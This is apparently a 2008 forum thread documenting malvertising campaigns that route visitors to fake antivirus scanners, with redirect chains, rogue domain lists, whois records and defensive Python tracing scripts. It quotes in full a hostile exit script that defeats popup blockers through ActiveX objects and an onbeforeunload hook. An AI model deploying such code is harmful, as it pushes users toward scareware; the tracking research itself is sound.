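        seen.add(url)
        status, headers = fetch(url)
        h = {k.lower(): v for k, v in headers.items()}
        hops.append((url, status, h.get("server", "")))
        if status in REDIRECT_STATUSES and "location" in h:
            url = urljoin(url, h["location"])      # Location may be relative
        else:
            url = None
    return hops


def domains_crossed(hops):
    """Distinct hostnames in order of first appearance along the chain."""
    out = []
    for url, _, _ in hops:
        host = urlsplit(url).hostname
        if host and host not in out:
            out.append(host)
    return out


def http_fetch(url, timeout=10):
    """Live fetcher: one request, body discarded, redirects left to the caller."""
    import http.client
    p = urlsplit(url)
    cls = http.client.HTTPSConnection if p.scheme == "https" else http.client.HTTPConnection
    conn = cls(p.hostname, p.port, timeout=timeout)
    path = (p.path or "/") + (("?" + p.query) if p.query else "")
    conn.request("GET", path, headers={
        "Host": p.netloc,
        "User-Agent": "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)",
        "Connection": "close",
    })
    resp = conn.getresponse()
    headers = dict(resp.getheaders())
    conn.close()
    return resp.status, headers


# Constructed offline responses. The first entry is the capture from the post;
# the rest are made up to exercise a relative Location and a redirect loop.
OFFLINE_RESPONSES = {
    "http://atlas-ads.com/": (302, {"X-Powered-By": "PHP/5.2.5-3",
                                    "Location": "http://atlassolutions.com",
                                    "Content-type": "text/html", "Content-Length": "0",
                                    "Connection": "close", "Server": "lighttpd/1.5.0"}),
    "http://atlassolutions.com": (200, {"Content-type": "text/html"}),   # constructed
    "http://loop.example/a": (302, {"Location": "/b"}),                  # constructed
    "http://loop.example/b": (302, {"Location": "http://loop.example/a"}),
}


def table_fetch(url):
    """Offline stand-in for http_fetch()."""
    return OFFLINE_RESPONSES.get(url, (404, {}))


if __name__ == "__main__":
    for hop in follow_chain("http://atlas-ads.com/", table_fetch):
        print(hop)
```

Against a live chain, call follow_chain(url, http_fetch) and keep the hop list: the tracking hosts that only ever appear in the status bar for a moment (statsa.php, in.cgi, the tds. hosts) are exactly the hops a browser never shows you afterwards.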
Kimberly
<h4>
Yahoo & Lady Speedstick
</h4>
It was a busy day exchanging information with Yahoo ... but the banners "seem" to be down. We are still waiting for an official confirmation though.

<h4>
Moli & Neopets
</h4>
I just checked back and unfortunately I can't bring you good news about these malverts. They are still up and running and appear everywhere.

On the International Page ....
On the homepage ... We clearly see the redirect happen, track.trackads.net is listed in the status bar.
A new tab pops up.
When we click on the tab, the fake warning shows up.
The fake scanner in action.
Just for information ... fully updated OS and Internet Explorer.

<h4>
New banner
</h4>
Sandi discovered a new malicious banner for americansingles.com
Ref

windowsxp-privacy.net - 84.252.148.213

windowsxp-privacy.net was created on the same day as xp-vista-update.net
Ref

Website Title: Google
ICANN Registrar: ESTDOMAINS, INC.
Created: 2008-03-25
Expires: 2009-03-25
Registrar Status: clientTransferProhibited
Name Server: MANAGEDNS1.ESTBOXES.COM (has 8,101 domains)
Name Server: MANAGEDNS2.ESTBOXES.COM
Name Server: MANAGEDNS3.ESTBOXES.COM
Name Server: MANAGEDNS4.ESTBOXES.COM
Whois Server: whois.estdomains.com

Server Type: gws
IP Location - Russian Federation - Mc Host.ru
Dedicated Hosting: windowsxp-privacy.net is hosted on a dedicated server.
Kimberly
<h4>
atlas-ads.com - Colgate
</h4>
Two new Colgate banners hosted on atlas-ads.com. This is the same website as the Neopets banners.

Banners.
atlas-ads.com/89000/728x90.swf
atlas-ads.com/89000/300x250.swf
Campaign.
tracktrack.trackads.net/statsa.php?campaign=89000
The 300x250 malvert was spotted this weekend on Zap2It.com. It has been removed by the administrators.
Ref
Kimberly
<h4>
Yahoo
</h4>
Official confirmation.

The malicious advertisements were taken down by Yahoo on 28th April 2008 at 5:30 PM GMT.
Kimberly
<h4>
IP Updates
</h4>
190.15.73.254
  1. Antivirus-scanner.com
  2. Antivirussecuritypro.com
  3. Bestadmedia.com
  4. Bestpharmacydeals.com
  5. Bestshopz.com
  6. Bestwnvmovies.com
  7. Bucksinsoft.com
  8. Cancerno.com
  9. Cashloanprofit.com
  10. Casinodealsgalore.com
  11. Cheap-auto-deals.com
  12. Co-search.com
  13. Deuscleanerpay.com
  14. Favouriteshop.com
  15. Fileprotector.com
  16. Firstsecondsearch.com
  17. Freepcsecure.com
  18. Freetvnow.net
  19. Great4mac.com
  20. Greyhathosting.com
  21. Hebooks-service.com
  22. Infyte.com
  23. Installprovider.com
  24. Internetadaultfriend.com
  25. Keywordcpv.com
  26. Libresystm.com
  27. Magicsearcher.com
  28. Malware-crush.com
  29. Manage-search.com
  30. Marketingdungeon.com
  31. Mediatornado.com
  32. Mightyfaq.com
  33. Misc-search.com
  34. Mobilesoftmarketing.com
  35. Moneypalacecash.com
  36. Myfavouritesearch.com
  37. Myhealth-life.org
  38. Myonlinefinance.com
  39. Mytravelgeek.com
  40. Netturbopro.com
  41. Nextlastsearch.com
  42. Onestopshopz.com
  43. Opensols.com
  44. Pcsoftw.com
  45. Pcsupercharger.com
  46. Popsmedia.com
  47. Popupnukerpro.com
  48. Prenetsearch.com
  49. Privacy-scan.com
  50. Prizesforyou.com
  51. R2d2adverising.com
  52. Roller-search.com
  53. Rombic-search.com
  54. Searchcolours.com
  55. Sellmoresoft.com
  56. Shopshot.com
  57. Softwcs.com
  58. Stratosearch.com
  59. Swiftcleaner.com
  60. Tallgrass-seach.com
  61. Vitecmedia.com
  62. Windefender.com
  63. Wontu-search.com
  64. Yourteacheronline.com
  65. Zappinads.com
  66. Zooworld-search.com
c-net 190.15.73
http://www.robtex.com/cnet/190.15.73.html
______________________________

antispywaremaster.com has moved.

89.18.181.100

Server Type: nginx/0.5.32
IP Location - Noord-holland - Amsterdam - Ion
  1. Acchiappavirus.com
  2. Adiosvirus.com
  3. Ahorrememoria.com
  4. Allertaminacce.com
  5. Altalimpeza.com
  6. Anonimutente.com
  7. Antiamenazas.com
  8. Antiespiamaestro.com
  9. Antievidence.com
  10. Antispionimaestro.com
  11. Antispywareconductor.com
  12. Antispywaremaster.com
  13. Antispywaremeister.com
  14. Antivirusfiable.com
  15. Antivirusforall.com
  16. Antivirusforalla.com
  17. Antivirusfueralle.com
  18. Antivirusmagique.com
  19. Antivirusparatodos.com
  20. Apagahistorico.com
  21. Apolloantivirus.com
  22. Archivoprotector.com
  23. Archivosenestado.com
  24. Atemaiserro.com
  25. Atrapavirus.com
  26. Aucunchoixpourvirus.com
  27. Aucunefaute.com
  28. Aucuninfection.com
  29. Aucunmenace.com
  30. Aucunserreurs.com
  31. Avcompleto.com
  32. Avsecurityplus.com
  33. Avseguro.com
  34. Bandoaivirus.com
  35. Barreraintegral.com
  36. Bastioneantivirus.com
  37. Beskyttelseonline.com
  38. Bestsellerantivirus.com
  39. Blanchdisc.com
  40. Borresuspasos.com
  41. Bossedeserreurs.com
  42. Brossedesfautes.com
  43. Bugseraser.com
  44. Caiforavirus.com
  45. Ceroamenazas.com
  46. Cerovirus.com
  47. Chasseurdeserreures.com
  48. Chaubugs.com
  49. Cleanerpotente.com
  50. Cleanpctool.com
  51. Cleanuptool.com
  52. Confidentsurf.com
  53. Contenidoseguros.com
  54. Contenteraser.com
  55. Controledemenaces.com
  56. Curerrores.com
c-net 89.18.181
http://www.robtex.com/cnet/89.18.181.html
Kimberly
<h4>
Estdomains ... Bad To The Bone
</h4>
Estdomains ... as if selling malicious adverts to Yahoo ain't enough; hey why not earn a few bucks more when you know that people will use search engines to find & solve similar problems ...

Scenario.

I got a malicious redirect on Yahoo, I search the web for similar problems.

Act.

Fire up Google, keywords: Yahoo banner redirects. Let's admit you click on the second link because the description is very similar to what you did experience ...
Hmm, the page we see doesn't reflect what we saw in Google. Instead we land on another search engine.
Ah well, let's close the window then. Oh NO ... not again ... not another alert. Sorry to say so but yes ... unfortunately exactly the same type of alert we see with the malicious Flash banners.
Where the hell did this come from?

We need to examine the source code of the webpage we asked for - abc01.my5gb.com/yahoo-pi0a/yahoo-banner-ads.html - A quick look reveals the presence of a script before the webpage is loaded.
We are redirected to w1_abc01m_yahoo-pi0a.teachingrank.net/images/header.php, which contains a function called LoadAd that redirects us to abc01m_yahoo-pi0a.teachingrank.net/index.html
index.html contains another script that leads us to fastwebway.com/exit.php?aid=0253&d=3&product=XPA
That page contains a rather complex script, checking different things ...
CODE
// Script as served by fastwebway.com/exit.php (line breaks and comments added for readability)
var url2go="http://fastwebway.com/soft.php?aid=0253&d=3&product=XPA";
var axkoord=new Array();
var AXsizeres=new Array();
// Suppress script errors so failed attempts stay invisible to the visitor
function blockError(){return true;}
window.onerror=blockError;
// Put back the original window.open if a popup blocker has replaced it
if(window.SymRealWinOpen){window.open=SymRealWinOpen;}
if(window.NS_ActualOpen){window.open=NS_ActualOpen;}
if(typeof(usingClick)=="undefined"){var usingClick=false;}
if(typeof(usingActiveX)=="undefined"){var usingActiveX=false;}
if(typeof(popwin)=="undefined"){var popwin=null;}
if(typeof(poped)=="undefined"){var poped=false;}
var blk=1;
var setupClickSuccess=false;
var googleInUse=false;
var pop="enter";
var myurl=document.location.protocol+"//"+document.location.host;
var durl="";
var MAX_TRIED=20;
var activeXTried=false;
var tried=0;
var randkey="0";
var myWindow;
var popWindow;
var usingAXSuccess=0;
// ActiveX path (IE): embed an object whose script context is later used to open the window, retrying up to 5 times
function usingAX(){
  if(usingActiveX){
    try{
      if(usingAXSuccess<5){
        document.writeln("<DIV><OBJECT ID=\"OurPopupObject\" CLASSID=\"clsid:2D360201-FFF5-11d1-8D03-00A0C959BC0A\" WIDTH=\"1\" HEIGHT=\"1\" STYLE=\"position: absolute; top: 0; left: 0;\"></OBJECT></DIV>");
        document.write("<INPUT STYLE=\"display:none;\" ID=\"autoHit\" TYPE=\"TEXT\" ONKEYPRESS=\"showActiveX()\">");
        popWindow=window.createPopup();
        popWindow.document.body.innerHTML="<DIV ID=\"objectRemover\"><OBJECT ID=\"getParentDiv\" STYLE=\"position:absolute;top:0px;left:0px;\" WIDTH=1 HEIGHT=1 DATA=\""+myurl+"/popuppopup.html\" TYPE=\"text/html\"></OBJECT></DIV>";
        usingAXSuccess=6;
      }
    }catch(e){
      if(usingAXSuccess<5){usingAXSuccess++;setTimeout("usingAX();",500);}
      else{if(usingAXSuccess==5){activeXTried=true;setupClick();}}
    }
  }
}
function tryActiveX(){
  if(!activeXTried&&!poped){
    try{
      OurPopupObj=document.getElementById("OurPopupObject");
      OurPopupObj.DOM.Script.execScript("function paypopupPop(){return window.open('about:blank','Ads','scrollbars=no,resizable=no,menubar=no,location=no,top="+axkoord["y"]+",left="+axkoord["x"]+",width="+AXsizeres["w"]+",height="+AXsizeres["h"]+"');}");
      popwin=OurPopupObj.DOM.Script.paypopupPop();
      if(popwin){popwin.location=url2go;poped=true;}
      if(usingAXSuccess==6&&googleInUse&&popWindow&&popWindow.document.getElementById("getParentDiv")&&popWindow.document.getElementById("getParentDiv").object&&popWindow.document.getElementById("getParentDiv").object.parentWindow){
        myWindow=popWindow.document.getElementById("getParentDiv").object.parentWindow;
      }else{
        if(usingAXSuccess==6&&!googleInUse&&popIframe&&popIframe.getParentFrame&&popIframe.getParentFrame.object&&popIframe.getParentFrame.object.parentWindow){
          myWindow=popIframe.getParentFrame.object.parentWindow;
          popIframe.location.replace("about:blank");
        }else{
          setTimeout("tryActiveX()",200);
          tried++;
          if(tried>=MAX_TRIED&&!activeXTried){activeXTried=true;setupClick();}
          return;
        }
      }
      openAXsc();
      window.windowFired=true;
    }catch(e){
      setTimeout("tryActiveX()",200);
      tried++;
    }
  }
}
// Fires a synthetic keypress on the hidden input, which calls showActiveX()
function openAXsc(){
  if(!activeXTried&&!poped){
    if(myWindow&&window.windowFired){
      window.windowFired=false;
      document.getElementById("autoHit").fireEvent("onkeypress",(document.createEventObject().keyCode=escape(randkey).substring(1)));
    }else{
      setTimeout("openAXsc();",100);
    }
    tried++;
    if(tried>=MAX_TRIED){activeXTried=true;setupClick();}
  }
}
function showActiveX(){
  if(!activeXTried&&!poped){
    if(googleInUse){
      window.daChildObject=popWindow.document.getElementById("objectRemover").children(0);
      window.daChildObject=popWindow.document.getElementById("objectRemover").removeChild(window.daChildObject);
    }
    newWindow=myWindow.open(url2go,"mywinv23","scrollbars=no,resizable=no,menubar=no,location=no,top="+axkoord["y"]+",left="+axkoord["x"]+",width="+AXsizeres["w"]+",height="+AXsizeres["h"]);
    if(newWindow){
      newWindow.blur();activeXTried=true;poped=true;
    }else{
      if(!googleInUse){googleInUse=true;tried=0;tryActiveX();}
      else{activeXTried=true;setupClick();}
    }
  }
}
// Plain window.open first; otherwise fall back to the ActiveX path or to the next click
function paypopup(){
  if(!poped){
    if(!usingClick&&!usingActiveX){
      popwin=window.open(url2go,"mywinv23","scrollbars=no,resizable=no,menubar=no,location=no,top="+axkoord["y"]+",left="+axkoord["x"]+",width="+AXsizeres["w"]+",height="+AXsizeres["h"]);
      if(popwin){poped=true;}
    }
  }
  if(!poped){
    if(usingActiveX){tryActiveX();}else{setupClick();}
  }
}
// Click path (XP SP2 / Opera / Firefox): the next click anywhere on the page opens the popup
function setupClick(){
  if(!poped&&!setupClickSuccess){
    if(window.Event){document.captureEvents(Event.CLICK);}
    prePaypopOnclick=document.onclick;
    document.onclick=gopop;
    setupClickSuccess=true;
  }
}
function gopop(){
  if(!poped){
    popwin=window.open(url2go,"mywinv23","scrollbars=no,resizable=no,menubar=no,location=no,top="+axkoord["y"]+",left="+axkoord["x"]+",width="+AXsizeres["w"]+",height="+AXsizeres["h"]);
    if(popwin){poped=true;}
  }
  if(typeof(prePaypopOnclick)=="function"){prePaypopOnclick();}
}
// Probes for the Google Toolbar object, which gets its own handling above
function detectGoogle(){
  if(usingActiveX){
    try{
      document.write("<DIV STYLE=\"display:none;\"><OBJECT ID=\"detectGoogle\" CLASSID=\"clsid:00EF2092-6AC5-47c0-BD25-CF2D5D657FEB\" STYLE=\"display:none;\" CODEBASE=\"view-source:about:blank\"></OBJECT></DIV>");
      googleInUse|=(typeof(document.getElementById("detectGoogle"))=="object");
    }catch(e){
      setTimeout("detectGoogle();",50);
    }
  }
}
// Browser fingerprinting: click path for XP SP2 / Opera / Firefox, ActiveX path for IE on XP SP2
function version(){
  var os="W0";
  var bs="I0";
  var _3=false;
  var _4=window.navigator.userAgent;
  if(_4.indexOf("Win")!=-1){os="W1";}
  if(detectSP2()){bs="I2";}
  else{if(_4.indexOf("Opera")!=-1){bs="I0";}
  else{if(_4.indexOf("Firefox")!=-1){bs="I0";}
  else{if(_4.indexOf("Microsoft")!=-1||_4.indexOf("MSIE")!=-1){bs="I1";}}}}
  if(top!=self){_3=true;}
  url2go=url2go;
  usingClick=blk&&((detectSP2())||(_4.indexOf("Opera")!=-1)||(_4.indexOf("Firefox")!=-1));
  usingActiveX=blk&&(detectSP2())&&!(_4.indexOf("Opera")!=-1)&&((_4.indexOf("Microsoft")!=-1)||(_4.indexOf("MSIE")!=-1));
  detectGoogle();
}
// "SV1" in the user agent or "SP2" in appMinorVersion marks IE on Windows XP SP2
function detectSP2(){
  return (window.navigator.userAgent.indexOf("SV1")!=-1||(navigator.appMinorVersion&&(navigator.appMinorVersion.indexOf("SP2")!=-1)));
}
version();
// Parses "x:0; y:0" and "w:...; h:..." strings into the coordinate and size arrays
function ParseParams(_5,_6){
  var _7=_5.split(/\b\s*;\s*\b/);
  for(var i=0;i<_7.length;i++){
    var _9=_7[i].split(/\b\s*(=|\:)\s*\b/);
    axkoord[_9[0]]=_9[_9.length-1];
  }
  var _a=_6.split(/\b\s*;\s*\b/);
  for(var i=0;i<_a.length;i++){
    var _9=_a[i].split(/\b\s*(=|\:)\s*\b/);
    AXsizeres[_9[0]]=_9[_9.length-1];
  }
}
function loadingPop(){
  ParseParams("x:0; y:0","w:"+window.screen.width+"; h:"+window.screen.height);
  if(!usingClick&&!usingActiveX){paypopup();}
  else{if(usingActiveX){tryActiveX();}else{setupClick();}}
  popwin.focus();
}
if(myurl==""){myurl=".";}
usingAX();
var tergetURL=url2go;
var exit=true;
// Runs when the window is closed (onbeforeunload): opens the target through the embedded Media Player and ActiveX objects
function sTb(){
  ParseParams("x:0; y:0","w:"+window.screen.width+"; h:"+window.screen.height);
  if(exit){
    Player.controls.play();
    stb.DOM.Script.window.open(tergetURL,"_blank","scrollbars=no,resizable=no,menubar=no,location=no,top="+axkoord["y"]+",left="+axkoord["x"]+",width="+AXsizeres["w"]+",height="+AXsizeres["h"]);
    if(window.attachEvent&&document.googleBar&&typeof(googleBar.Search)!="undefined"){window.focus();}
    Player.controls.stop();
    window.focus();
  }
}
window.onbeforeunload=sTb;
document.write("<object id=Player classid=\"CLSID:6BF52A52-394A-11d3-B153-00C04F79FAA6\" width=\"0\" height=\"0\">");
document.write("<param name=\"URL\" value=\"about:blank\">");
document.write("<PARAM name=\"uiMode\" value=\"none\">");
document.write("<param name=\"autoStart\" value=\"false\">");
document.write("<param name=\"ShowStatusBar\" value=\"0\"></object>");
document.write("<object id=\"stb\" classid=\"clsid:2D360201-FFF5-11d1-8D03-00A0C959BC0A\" width=0 height=0></object>");
Anyways ... when we close the initial search window, we get our fake scanner warning and jump to onlinexpscanner.com/2008/3/freescan.php?aid=880253
<h4>
Domains
</h4>
abc01.my5gb.com - 66.96.249.86

IP Location - Queensland - Brisbane - Lithoptix

Domain Name: MY5GB.COM
Registrar: ENOM, INC.
Whois Server: whois.enom.com
Name Server: NS1.MY5GB.COM
Name Server: NS2.MY5GB.COM
Status: clientTransferProhibited
Updated Date: 27-feb-2008
Creation Date: 22-may-2007
Expiration Date: 22-may-2009

Name Servers:
ns1.my5gb.com
ns2.my5gb.com
______________________________

abc01m_yahoo-pi0a.teachingrank.net - 89.149.227.25

Registration Service Provided By: ESTDOMAINS INC
Contact: +1.3027224217

Domain Name: TEACHINGRANK.NET

Server Type: Apache/2.2.3 (CentOS)
IP Location - Berlin - Berlin - Netdirekt E.k
Reverse IP: 48 other sites hosted on this server

Registrant:
Hampton
William M (WilliamMHampton@fontdrift.com)
112 Shady Pines Drive
Radcliff
Gulzhou,40160
CN
Tel. +270.9492330
Fax. +270.9492330

Creation Date: 19-Apr-2008
Expiration Date: 19-Apr-2009

Domain servers in listed order:
ns3.itsfreedns.com
ns2.itsfreedns.com
ns1.itsfreedns.com
______________________________

onlinexpscanner.com - 72.233.40.58

Website Title: XP antivirus protection - Official web site
ICANN Registrar: DIRECTI INTERNET SOLUTIONS PVT. LTD. D/B/A PUBLICDOMAINREGISTRY.COM
Created: 2008-03-20
Expires: 2009-03-20
Name Server: NS1.MYNICK.NAME (has 1,114 domains)
Name Server: NS2.MYNICK.NAME
Name Server: NS3.MYNICK.NAME
Name Server: NS4.MYNICK.NAME
Whois Server: whois.publicdomainregistry.com

Server Type: Apache
IP Location - Texas - Plano - Layered Technologies Inc
Dedicated Hosting: onlinexpscanner.com is hosted on a dedicated server.
______________________________

fastwebway.com - 72.36.198.5

Website Title: 403 Forbidden
ICANN Registrar: ESTDOMAINS, INC.
Created: 2008-03-13
Expires: 2009-03-13
Name Server: MANAGEDNS1.ESTBOXES.COM (has 8,057 domains)
Name Server: MANAGEDNS2.ESTBOXES.COM
Name Server: MANAGEDNS3.ESTBOXES.COM
Name Server: MANAGEDNS4.ESTBOXES.COM
Whois Server: whois.estdomains.com

Server Type: Apache
IP Location - New York - New York - Layered Technologies Inc
Dedicated Hosting: fastwebway.com is hosted on a dedicated server.

Seen on March 23rd - Ref.
______________________________

teachingrank.net being created on 19th April 2008 ... isn't that a coincidence ...
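The chain above (search result -> my5gb.com -> teachingrank.net -> fastwebway.com exit.php/soft.php -> onlinexpscanner.com freescan.php) is exactly what shows up in a proxy log if you follow the Referer headers. As an added example, not code from the forum post: a small Python script that rebuilds such a chain from log lines and flags the rogue-scanner landing. The log format, timestamps and client addresses are constructed; the URLs and the exit.php / soft.php?product=XPA / freescan.php?aid= patterns are the ones quoted above.

```python
"""Rebuild a malvertising redirect chain from proxy log Referer headers and
flag rogue-AV landing pages.

Added example for this thread, not code from the forum post. The log
format, timestamps and client addresses are constructed; the URLs are the
ones quoted in the post above.
"""
import re
from urllib.parse import parse_qs, urlsplit

# Constructed log format: "<epoch> <client> <method> <url> <status> <referer>"
# ("-" marks a request that carried no Referer header).
SAMPLE_LOG = """\
1207612801 10.0.0.7 GET http://abc01.my5gb.com/yahoo-pi0a/yahoo-banner-ads.html 200 http://www.google.com/search?q=yahoo+banner+redirects
1207612802 10.0.0.7 GET http://w1_abc01m_yahoo-pi0a.teachingrank.net/images/header.php 200 http://abc01.my5gb.com/yahoo-pi0a/yahoo-banner-ads.html
1207612803 10.0.0.7 GET http://abc01m_yahoo-pi0a.teachingrank.net/index.html 200 http://w1_abc01m_yahoo-pi0a.teachingrank.net/images/header.php
1207612804 10.0.0.7 GET http://fastwebway.com/exit.php?aid=0253&d=3&product=XPA 200 http://abc01m_yahoo-pi0a.teachingrank.net/index.html
1207612809 10.0.0.7 GET http://fastwebway.com/soft.php?aid=0253&d=3&product=XPA 302 http://fastwebway.com/exit.php?aid=0253&d=3&product=XPA
1207612810 10.0.0.7 GET http://onlinexpscanner.com/2008/3/freescan.php?aid=880253 200 http://fastwebway.com/soft.php?aid=0253&d=3&product=XPA
1207612811 10.0.0.9 GET http://www.example.com/ 200 -
"""

LOG_RE = re.compile(
    r"^(?P<ts>\d+) (?P<client>\S+) (?P<method>[A-Z]+) (?P<url>\S+) "
    r"(?P<status>\d{3}) (?P<referer>\S+)$"
)


def parse_log(text):
    """Return one dict per well-formed line; malformed lines are skipped."""
    records = []
    for line in text.splitlines():
        m = LOG_RE.match(line.strip())
        if not m:
            continue
        rec = m.groupdict()
        rec["referer"] = None if rec["referer"] == "-" else rec["referer"]
        records.append(rec)
    return records


def classify(url):
    """Label the URL shapes this campaign uses, or return None."""
    parts = urlsplit(url)
    path = parts.path.lower()
    query = parse_qs(parts.query)
    product = query.get("product", [""])[0].upper()
    if path.endswith("/freescan.php") and "aid" in query:
        return "fake-scanner-landing"   # onlinexpscanner.com/.../freescan.php?aid=...
    if path.endswith("/soft.php") and product == "XPA":
        return "rogue-av-download"      # fastwebway.com/soft.php?...&product=XPA
    if path.endswith("/exit.php") and product == "XPA":
        return "exit-popup-script"      # the script quoted in the post
    return None


def trace_back(records, client, url):
    """Follow Referer headers backwards from url to the page the visitor asked for."""
    by_key = {(r["client"], r["url"]): r for r in records}
    chain, seen = [url], {url}
    cur = by_key.get((client, url))
    # Stop at the first URL we never saw requested (e.g. the search engine page)
    while cur and cur["referer"] and cur["referer"] not in seen:
        chain.append(cur["referer"])
        seen.add(cur["referer"])
        cur = by_key.get((client, cur["referer"]))
    chain.reverse()
    return chain


def find_rogue_chains(records):
    """For every fake-scanner hit, return the full chain that led the client there."""
    findings = []
    for rec in records:
        if classify(rec["url"]) != "fake-scanner-landing":
            continue
        chain = trace_back(records, rec["client"], rec["url"])
        findings.append({
            "client": rec["client"],
            "chain": chain,
            "hosts": [urlsplit(u).hostname for u in chain],
            "stages": [classify(u) for u in chain],
        })
    return findings


if __name__ == "__main__":
    for f in find_rogue_chains(parse_log(SAMPLE_LOG)):
        print("client", f["client"], "reached a fake scanner via:")
        for url, stage in zip(f["chain"], f["stages"]):
            print("  ", stage or "-", url)
```

The first host in each reconstructed chain is the publisher (or search engine) page the visitor actually asked for, which is the party to notify.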
Kimberly
<h4>
imunizator.com
</h4>
Ref: http://www.bluetack.co.uk/forums/index.php...ost&p=86697

Cache Date: 2008-05-01.

Registrant:
PrivacyProtect.org
Domain Admin (contact@privacyprotect.org)
P.O. Box 97
All Postal Mails Rejected, visit Privacyprotect.org
Moergestel
null,5066 ZH
NL
Tel. +45.36946676

Current Record.

Registrant:
Ind
Vasil pentykovich (leonardo126@gmail.com)
Ny tipa normalnij address
Shoblo
Other,20365
PR
Tel. +023.2569856
Fax. +023.5565599

Registrant Search: "Ind" owns about 256 other domains


Thanks for the hint.
Kimberly
<h4>
photobucket.com
</h4>
A warning about photobucket.com was issued again on Sandi's blog.

Photobucket isn't displaying 1 but at least 2 malicious banners.

The first advertisement is featuring Lady Speedstick again.

Screenshot in situ.
Banner.
atlas-ads.com/99000/728x90.swf
Campaign.
track.trackads.net/statsa.php?campaign=99000&u=1210261259237
track.trackads.net/swf/gnida.swf?campaign=99000&u=1210261259237&
paramss=[removed]

track.trackads.net/statss.php?campaign=99000&u=1210261259237&
paramss=[removed]

tds.maxconvert.com/?paramss=[removed]
adtds.trackads.net/in.cgi?2&depid=maxc_clr08&cid=2271&parid=mc_4087630891&
spywaredestructor.com/scanner/scan.php?landid=3&depid=maxc%5Fclr08&cid=2271&parid=mc%5F4087630891&bs=1
spywaredestructor.com/scanner/scan.php?landid=3&depid=maxc%5Fclr08&cid=2271&parid=mc%5F4087630891
______________________________

The second malicious banner is an advertisement for The Fast & The Furious - Tokyo Drift.

Screenshot in situ.
Banner.
photobkt-images.adbureau.net/photobkt/cinema_photobucket_728x90.swf
Campaign.
adoptserver.info/ad0.php?url=http://a1356.g.akamai.net/7/1356/2850/20060508201709/&c=567890057

iexplorer-security.org/?id=987650057
At the time of the write up, the campaign is active and redirects to the following URLs:
fastwebway.com/soft.php?aid=024204&d=1&product=XPA
xponlinescanner.com/2008/1/freescan.php?aid=77024204
This is the redirect reported at the photobucket forums.

<h4>
atlas-ads.com
</h4>
As usual, the 300x250 size of the Lady Speedstick banner is present on atlas-ads.com.

Banner.
atlas-ads.com/99000/300x250.swf
Campaign.
track.trackads.net/statsa.php?campaign=99000&u=1210261259237
Note: This is the same campaign as the 728x90 banner.
Kimberly
<h4>
Interesting ... media2.mediafileshost.com
</h4>
I was going over some network captures when the following domain / URL related to the photobucket redirects did catch my attention.
media2.mediafileshost.com/images/prep_ctr.php?imgfile=8047_562504_7245898_90_728.html&partnerId=[removed]&appId=[removed]&advertiserId=[removed]&keywordId=[removed]&type=[removed]&uuid=[removed]&keyword=[removed]&matchedBy=[removed]&redirectUrl=http%3A%2F%2Fjavascript
Note: I removed the additional parameters since only the bolded part is of interest.

And what did I spot there ... an iframe leading to the infamous atlas-ads.com. Nothing special you might say because many ads are displayed this way. But read on ...
CODE
<IFRAME WIDTH="728" HEIGHT="90" MARGINWIDTH="0" MARGINHEIGHT="0" HSPACE="0" VSPACE="0" FRAMEBORDER="0" SCROLLING="no"
SRC="http://atlas-ads.com/engine?size=728x90&campaign=99000&
clickurl=http://www.colgate.com/app/LadySpeedStick/US/HomePage.cvsp&linktarget=_blank"></IFRAME>
media2.mediafileshost.com - 66.179.234.173

Domain Name: MEDIAFILESHOST.COM
Registrar: GODADDY.COM, INC.
Whois Server: whois.godaddy.com
Name Server: NS1.MYGEEK.COM
Name Server: NS3.MYGEEK.COM
Updated Date: 15-feb-2008
Creation Date: 15-feb-2008
Expiration Date: 15-feb-2010

CustName: myGeek.com
Address: 120 E. Van Buren Street 2nd Floor West, Suite 202
City: Phoenix
StateProv: AZ
PostalCode: 85004
Country: US
RegDate: 2004-09-21
Updated: 2004-09-21
______________________________

Mediafileshost.com - 66.104.86.4

Website Title: None given.
ICANN Registrar: GODADDY.COM, INC.
Created: 2008-02-15
Expires: 2010-02-15
Name Server: NS1.MYGEEK.COM (has 22 domains)
Name Server: NS3.MYGEEK.COM
Whois Server: whois.godaddy.com

IP Location - United States - Xo Communications

Registrant:
Domains by Proxy, Inc.
DomainsByProxy.com
15111 N. Hayden Rd., Ste 160, PMB 353
Scottsdale, Arizona 85260
United States

Domain Name: MEDIAFILESHOST.COM
Created on: 15-Feb-08
Expires on: 15-Feb-10
Last Updated on: 15-Feb-08
______________________________

Can't say I like these domains a lot for several reasons, not to mention that at least 1 other issue was reported on 4th April 2008 on the softpedia forums; media2.mediafileshost.com with a similar URL and the mention "You privacy is in danger". Unfortunately I have no idea which language is spoken in the post.
Seeing it's a privacy protected record, I would advise extreme caution.
Kimberly
<h4>
www.mininova.org
</h4>
Nielsen banner present on www.mininova.org.

Banner & Screenshot in situ.
d3.zedo.com/OzoDB/8/e/407122/V1/nielsen_120x600.swf
Campaign.
adoptserver.info/crossdomain.xml
adoptserver.info/ad0.php?url=http://a1356.g.akamai.net/7/1356/2850/20060508201709/&c=567890067
iexplorer-security.org/?id=987650067
mystats.com/crossdomain.xml
At the time of the write up, the campaign is active and redirects to the following URLs:
fastwebway.com/soft.php?aid=024211&d=1&product=XPA
xponlinescanner.com/2008/3/freescan.php?aid=77024211
<h4>
d3.zedo.com
</h4>
d3.zedo.com is Akamai hosted content ...

canonical name a456.g.akamai.net.
aliases d3.zedo.com
d3.zedo.com.edgesuite.net

Updated 05:59 AM: Added in situ screenshot.
Kimberly
<h4>
www.rlslog.net
</h4>
Travel banner present on www.rlslog.net aka Releaselog. The banner isn't new, it was first reported by Sandi on Apr 3 2008 and seen on photobucket on Apr 12 2008.

Screenshot in situ.
Banner.
content.yieldmanager.edgesuite.net/atoms/d0/e4/38/21/d0e4382110fedd6e68c86c5f1febe683.swf
Campaign.
stathome.net/c/index.php?id=eWthVEdIdkFTY0RBcXpPQjm7NkiZ0Ym9oPTEyMDc2NTY3NzEmcG56Y252dGE9dmFmbmVxYmF2cAYNkiDgNmYNkiDgNm

waytotheprofit.com/?cmpid=insardonic&adid=intl
This is exactly the same advertising link and campaign as spotted on photobucket on Apr 12 2008.

It's unacceptable that an identified banner is still rotating a month after it was first reported.
Kimberly
<h4>
photobucket.com - slow cleanup!!!
</h4>
On 8 May 2008 we discovered two malvertisements on photobucket. - Ref - Today, I got hit by the Lady Speedstick banner again.

Screenshot in situ.
On the 8th May, photobucket was alerted through the "Contact Us" form as requested on their forums.

They replied very fast to the information I did forward via the Contact form.
QUOTE
Dear Kimberly @ Photobucket Forums,

Thank you so much for sharing all of this information with us. It has been
passed on to our Advertisement team. They will contact you if they have
further questions.

Sincerely,

Your Photobucket Support Team

------
